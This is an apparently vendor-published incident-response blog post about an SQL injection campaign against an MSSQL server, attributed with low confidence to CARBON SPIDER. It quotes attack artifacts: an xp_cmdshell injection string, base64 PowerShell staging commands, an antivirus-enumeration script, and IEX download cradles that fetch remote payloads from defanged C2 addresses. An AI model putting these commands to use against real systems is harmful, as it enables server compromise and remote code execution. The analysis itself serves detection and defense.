# How CrowdStrike Stopped an SQL Injection Campaign

**[crowdstrike.com/blog/how-crowdstrike-stopped-an-sql-injection-campaign/](https://www.crowdstrike.com/blog/how-crowdstrike-stopped-an-sql-injection-campaign/)**

Michael DeCristofaro - Eric Loui - Josh Reynolds August 3, 2021

In this blog, we describe a campaign of recent activity where CrowdStrike observed an actor
[likely related to CARBON SPIDER performing SQL injections in order to gain code execution](https://adversary.crowdstrike.com/en-US/adversary/carbon-spider/)
as an initial infection vector. A combined effort from Falcon Complete™ (managed detection
and response), Falcon OverWatch™ (managed threat hunting), and CrowdStrike Intelligence
uncovered this campaign. The attack demonstrates how CARBON SPIDER has likely
introduced new tactics, techniques and procedures (TTPs) following the actor’s apparent
termination of the _[Darkside ransomware-as-a-Service program in response to scrutiny](https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/)_
[following the Colonial Pipeline Darkside incident.](https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/)

Collaboration between Falcon Complete, Falcon OverWatch and CrowdStrike Intelligence is
a force multiplier protecting customers from the latest threats. Leveraging Falcon OverWatch
and their expert threat hunters, Falcon Complete is able to perform timely surgical
remediation, extract important artifacts, and ultimately stop breaches.

Partnering with CrowdStrike Intelligence allows these teams to take advantage of incident
[attribution, such as understanding adversary motives (targeted, financial, or hacktivism), their](https://www.crowdstrike.com/cybersecurity-101/hacktivism/)
Tactics, Techniques, and Procedures (TTPs), as well as enabling proactive discovery of actor


-----

Indicators of Attack and Indicators of Compromise to keep customers safe. Knowing an
adversary and their intent is powerful knowledge during the triage and remediation process
to best track past activity and anticipate future actions.

## Falcon Complete Investigates and Responds

Falcon Complete began responding to detections triggered within the CrowdStrike Falcon®
[platform tagged with MITRE ATT&CK technique T1059, “Execution via PowerShell” where a](https://attack.mitre.org/techniques/T1059/)
Microsoft SQL Server executable was blocked from launching a PowerShell script. The
Falcon Complete team acknowledged and began investigating the detections within 6
minutes. Threat hunters from the Falcon OverWatch team identified a broad range of
reconnaissance activity as highly suspicious, and flagged the additional activity for review 11
minutes after the initial detection occurred.

Figure 1. Initial detection


-----

Figure 2. OverWatch enriched process tree

Further reviewing the process tree with added OverWatch enrichment, Falcon identified
multiple CMD.EXE instances executing under Microsoft SQL Server.


-----

```
ping -n 12 127.0.0.1

```
```
echo 
ZnVuY3Rpb24gc3RhcnRQcyAoJG5hbWVzKXsgJGNoZWNrTGlzdCA9JG5hbWVzLlNwbGl0KCIgIik7
 >> "F:\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Log\tmpfhikx.txt"
echo $Base64 = Get-Content -Path "F:\Microsoft SQL
Server\MSSQL13.MSSQLSERVER\MSSQL\Log\tmpfhikx.txt"; $Base64 = $Base64 replace "`t|`n|`r",""; $Content =
[System.Convert]::FromBase64String($Base64); Set-Content -Path
"C:\Windows\Temp\abc.ps1" -Value $Content -Encoding Byte >> "F:\Microsoft
SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Log\tmppsrlje.ps1"
powershell -ExecutionPolicy ByPass -File "F:\Microsoft SQL
Server\MSSQL13.MSSQLSERVER\MSSQL\Log\tmppsrlje.ps1" & del /F /Q
"F:\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Log\tmpfhikx.txt" & del
/F /Q "F:\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Log\tmppsrlje.ps1"
powershell -ExecutionPolicy ByPass -File "F:\Microsoft SQL
Server\MSSQL13.MSSQLSERVER\MSSQL\Log\tmppsrlje.ps1"

```
```
C:\Windows\Temp\abc.ps1

```
```
echo 1

```
```
powershell.exe -Enc
"SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB

```
```
echo 1

```

Reviewing the commands shows the actor used both `echo 1 and` `ping -n [number]`
```
127.0.0.1 multiple times to ensure connectivity and responsiveness of the host to the SQL

```
Injection attempts.

After verifying access, the actor used the `echo command to write base64-encoded content`
into a file located at `F:\Microsoft SQL`
```
Server\MSSQL13.MSSQLSERVER\MSSQL\Log\tmpfhikx.txt .

```
Next, PowerShell was used to `echo a base64 decoding script into` `F:\Microsoft SQL`
```
Server\MSSQL13.MSSQLSERVER\MSSQL\Log\tmppsrlje.ps1 that would decode tmpfhikx.txt

```
and write the final payload using `Set-Content to` `C:\Windows\Temp\abc.ps1 .`


-----

The actor then attempted to execute `tmppsrlje.ps1, and finally execute the decoded`
payload `C:\Windows\Temp\abc.ps1 . The decoded content of the Base64 payload is`
below.
```
function startPs ($names)
{
$checkList =$names.Split(" ");
$process = Get-Process;
for($i=0; $i -lt $process.Length; $i++)
{
if($checkList.Contains($process[$i].ProcessName))
{
return "+";
}
}
return "-";
}
startPs "ALMon Alsvc SAVAdminService SavService AvastSvc Avastgui PSUAMain
PSUAService PSANHost egui ekrn avgcsrva avgemca avgfwsa avgidsagenta avgnsa avgsvca
avgui avguix avgwdsvca AVGUI AVGSvc EndpointService EndpointIntegration BITS
DevMgmtService ProductAgentService bdagent ZoneAlarmUpdate ZoneAlarmCrashHandler64
ZoneAlarmCrashHandler ZA_WSC ZANG_MgrSvc ZANG_AV UI_Main AR_Service"

```
The above script is an antivirus enumeration PowerShell payload that acquires running
processes using `Get-Process and searches for the following antivirus processes:`


-----

```
AVGSvc

```

If any of these process names are found, the character “+” is returned, otherwise the “–”
character is returned.

After none of the anti-viruses from the enumeration script were found, the actor then
attempted to execute a base64 encoded PowerShell command.
```
   powershell.exe -Enc
   "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA

```
The PowerShell command decodes to an Invoke-Expression download cradle for an
additional PowerShell script.
```
   IEX (New-Object
   Net.WebClient).DownloadString('http://46.17.105[.]207/6432565764923.ps1')

```
Falcon blocked the download of this script. CrowdStrike Intelligence subsequently retrieved
the payload and confirmed it is a distinctive PowerShell stager named Demux commonly
used by CARBON SPIDER.

_Demux_ [executes a stager DLL in memory. The stager DLL leveraged in this attack uses the](https://attack.mitre.org/techniques/T1055/)
IP addresses `46.17.105[.]207 and` `185.242.85[.]126` for command-and-control (C2)
communications. CrowdStrike Intelligence has observed exclusive use of Demux PowerShell
loaders and the stager DLLs during CARBON SPIDER-related activity. Based on the current
available evidence, it is assessed with low confidence that this activity originates from
CARBON SPIDER.

For Falcon OverWatch and Falcon Complete on the frontlines, attribution is an important
piece of information to take into account. In this case, CARBON SPIDER is a financially
motivated eCrime actor, who has recently been conducting high profile Big Game Hunting


-----

ransomware campaigns. Attribution from CrowdStrike Intelligence allows Threat Hunters and
MDR Analysts understand the adversary’s intent and investigate for Tactics, Techniques, and
Procedures commonly used by the known threat actor.

Concurrently to collaborating with CrowdStrike Intelligence, Falcon Complete was still
triaging and responding to the active incident in the customer environment. By this point the
SQL server had been network contained and further investigation into the initial access
vector was underway.

### Pivoting to the Web Server to Confirm Initial Access Vector

After reviewing the initial OverWatch alert, Falcon Complete pivoted to reviewing the IIS logs
from the customer’s web server at the time of the incident to confirm the initial access vector
as SQL Injection. Through analysis of the logs, Falcon Complete confirmed that the actor
used the SQL `xp_cmdshell command to execute multiple PowerShell (PS) payloads.`

In an attempt to hide their intent and to possibly bypass security technologies, such as webapplication firewalls, the actor made use of multiple encoding techniques within the SQLinjection statements. An example injection can be found here:
```
   ‘;dEClarE @czyd VaRcHar(8000);SEt @czyd=0x6563686f2031;iNsERt inTo
   SqLMaPoUtPUT(data) eXec master..xp_cmdshell @czyd-
```
This injection finishes the legitimate SQL statement using a single quote (‘), proceeds to
create the variable named `czyd, sets its contents to the hexadecimal-encoded value of`
```
0x6563686f2031 (which decodes to echo 1 ), and executes the variable using eXec
master..xp_cmdshell @czyd . The use of iNsERt inTo SqLMaPoUtPUT(data) indicates

```
the actor likely leveraged the sqlmap tool to perform automated SQL injection against the
target web application.

CARBON SPIDER’s PowerShell payloads were executed using the encoding patterns
described above within additional SQL-injection statements.

An interesting artifact recovered from the web server IIS logs showed the actor’s failed
attempts to continue exploitation after the SQL server was network contained. After their
remote download was blocked, the actor attempted to echo the Demux PowerShell content
into a file to execute, however the command failed due to the SQL server being contained.
By reviewing the IIS logs, Falcon Complete was then able to provide the customer with
specific information on the SQL Injection Vulnerabilities, and provide them with key
information for fixing the vulnerable web page.

Falcon Complete began response within 6 minutes, contained the threat in under 30
minutes, and fully remediated the host within 1 hour and 45 minutes, with active support from
Falcon OverWatch and CrowdStrike Intel. By stopping the breach before the actor could


-----

achieve their goals and cause any significant impact, Falcon Complete again demonstrated
the critical importance of rapid response.

## Additional OverWatch Observations

CrowdStrike Falcon OverWatch observed a similar incident, in which successful SQL
injection led to execution of encoded PowerShell commands. The commands decoded to:
```
   $p=((New-Object
   Net.WebClient).DownloadString('http[:]//46.17.105[.]207/lzbt6001sop_64refl.ps1'))
   ('IeX')

```
This command downloaded a Demux PowerShell loader, which loads a DLL into memory.
This DLL used the same IP addresses `46.17.105[.]207 and` `185.242.85[.]126 for C2`
communications.

In addition to the PowerShell download cradle, OverWatch also observed the actor using the
same `echo 1 and` `ping commands, as well as` `wmic to query the domain name.`
```
   echo 1
   ping -n 10 127.0.0.1
   wmic ComputerSystem get domain

## Conclusion

```

-----

This incident described in this blog is attributed with low confidence to CARBON SPIDER,
based on use of the Demux Loader and stager DLL combination. CARBON SPIDER’s likely
use of [SQL injection as an initial access method represents a new development, marking a](https://www.crowdstrike.com/cybersecurity-101/sql-injection/)
departure from the typical indiscriminate spam campaigns the actor continues to conduct.
Gaining code execution on an MSSQL server within an environment could provide an
avenue for the actor to move laterally into the corporate network if compromised servers are
not located in a Demilitarized Zone (DMZ).

This campaign demonstrates CARBON SPIDER’s willingness and ability to introduce
different TTPs in order to compromise victims. It is likely the actor will continue to leverage
both spam and server exploitation to achieve initial access in the near-term.

Falcon Complete, Falcon OverWatch and CrowdStrike Intelligence continually partner to
proactively hunt, identify, and remediate malicious activity from threat actors. By working
together, these teams take full advantage of CrowdStrike’s expertise and keep CrowdStrike
customers protected 24/7/365.

**Additional Resources**

_[Learn more by visiting the Falcon Complete product webpage.](https://www.crowdstrike.com/endpoint-security-products/falcon-complete/)_
_Read a white paper: CrowdStrike Falcon Complete: Instant Cybersecurity Maturity for_
_Organizations of All Sizes._
_Test CrowdStrike next-gen AV for yourself:_ _[Start your free trial of Falcon Prevent™.](https://go.crowdstrike.com/try-falcon-prevent.html)_


-----